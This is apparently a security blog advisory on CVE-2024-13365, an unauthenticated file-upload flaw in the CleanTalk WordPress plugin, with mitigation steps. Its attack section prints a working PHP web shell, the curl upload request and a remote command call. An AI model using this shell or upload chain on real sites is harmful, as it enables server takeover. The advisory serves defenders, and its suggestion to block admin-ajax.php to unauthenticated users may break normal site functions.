Complete Guide to CVE-2024-13365: Critical WordPress Vulnerability in CleanTalk Plugin - SECURITY8.CA - Empowering Users Against Cyber Threats & Enhancing Digital Security

CVE-2024-13365 is a critical vulnerability affecting the Security & Malware Scan by CleanTalk WordPress plugin. This flaw allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE). The vulnerability is due to improper validation of uploaded files, particularly within the checkUploadedArchive() function, making it a severe security threat.

CVE ID: CVE-2024-13365
CVSS Score: 9.8 (Critical)
Affected Plugin: Security & Malware Scan by CleanTalk
Affected Versions: Up to and including version 2.149
Fixed Version: 2.150
Impact: Remote Code Execution (RCE) via arbitrary file upload
Patch Release Date: February 2024

Technical Details

The vulnerability exists because the plugin’s malware scanning feature allows users to upload ZIP files for scanning. However, due to inadequate input validation, an attacker can craft a malicious ZIP archive containing a PHP backdoor and upload it without authentication. When extracted, this PHP script can be accessed and executed remotely.

Attack Scenario: Exploiting CVE-2024-13365

Step 1: Attacker Prepares a Malicious Payload

The attacker creates a backdoor.php file containing a simple web shell:

<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    $cmd = ($_GET['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

This script allows the attacker to execute commands on the server remotely via a URL.

Step 2: The Attacker Compresses the Malicious File into a ZIP

zip payload.zip backdoor.php

Step 3: Uploading the Malicious File

Using curl, the attacker sends a POST request to the vulnerable CleanTalk plugin’s AJAX handler:

curl -X POST "https://example.com/wp-admin/admin-ajax.php?action=cleantalk_scan_upload" \
  -F "[email protected]" \
  -H "Content-Type: multipart/form-data"

If the site is vulnerable, the ZIP file is extracted, and backdoor.php is placed in:

/wp-content/uploads/2024/02/backdoor.php

Step 4: Remote Execution of Commands

Once the file is uploaded, the attacker executes commands remotely:

curl "https://example.com/wp-content/uploads/2024/02/backdoor.php?cmd=whoami"

✅ Output:

www-data

🔴 The attacker now has full control of the WordPress site!

Impact of CVE-2024-13365

A successful exploit allows an attacker to:

Gain full administrative access to the WordPress site.
Modify or delete critical files and databases.
Inject malicious scripts for phishing or malware distribution.
Turn the website into a botnet for further attacks.

Mitigation Strategies

1️⃣ Immediate Plugin Update

🚀 Update the CleanTalk plugin to version 2.150+ immediately.

Navigate to WordPress Admin > Plugins > Installed Plugins
Locate Security & Malware Scan by CleanTalk and update it.

2️⃣ Restrict Access to `admin-ajax.php`

Since admin-ajax.php is publicly accessible, restricting access to authenticated users can prevent unauthorized file uploads.

Apache Configuration:

<FilesMatch "admin-ajax.php">
    Require valid-user
</FilesMatch>

NGINX Configuration:

location ~* /wp-admin/admin-ajax.php {
    allow 192.168.1.0/24;
    deny all;
}

3️⃣ Disable Execution of PHP in Uploads Folder

🚀 To prevent execution of uploaded PHP files, add the following to the .htaccess file in /wp-content/uploads/:

<FilesMatch "\.(php|phtml|php3|php4|php5)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>

4️⃣ Implement a Web Application Firewall (WAF)

A WAF can block unauthorized file uploads and suspicious requests.

5️⃣ Scan for Indicators of Compromise (IoCs)

🔎 Run the following command to detect unknown PHP files in /wp-content/uploads/:

find /var/www/html/wp-content/uploads/ -type f -name "*.php"

If any unexpected PHP files appear, immediately remove them and investigate further.

6️⃣ Change Admin Credentials and Enable 2FA

Immediately reset all admin passwords
Check for unauthorized admin accounts
Enable Two-Factor Authentication (2FA) for all administrators

Final Recommendations

Action	Status
Update Plugin to v2.150+	✅
Restrict `admin-ajax.php` to authenticated users	✅
Block PHP execution in `uploads/`	✅
Implement a Web Application Firewall (WAF)	✅
Scan and remove any unauthorized files	✅
Change passwords and enable 2FA	✅

Conclusion

CVE-2024-13365 is a severe security vulnerability that allows unauthenticated attackers to gain full control of vulnerable WordPress sites through arbitrary file uploads. Simply setting a password on /wp-admin/ is not sufficient, as admin-ajax.php remains accessible to the public.

🚀 To fully mitigate this risk:

Update the plugin immediately.
Restrict access to admin-ajax.php.
Prevent execution of PHP files in /uploads/.
Use a Web Application Firewall (WAF).

By taking these security measures, WordPress administrators can protect their sites from potential exploitation and ensure their website remains secure against future threats.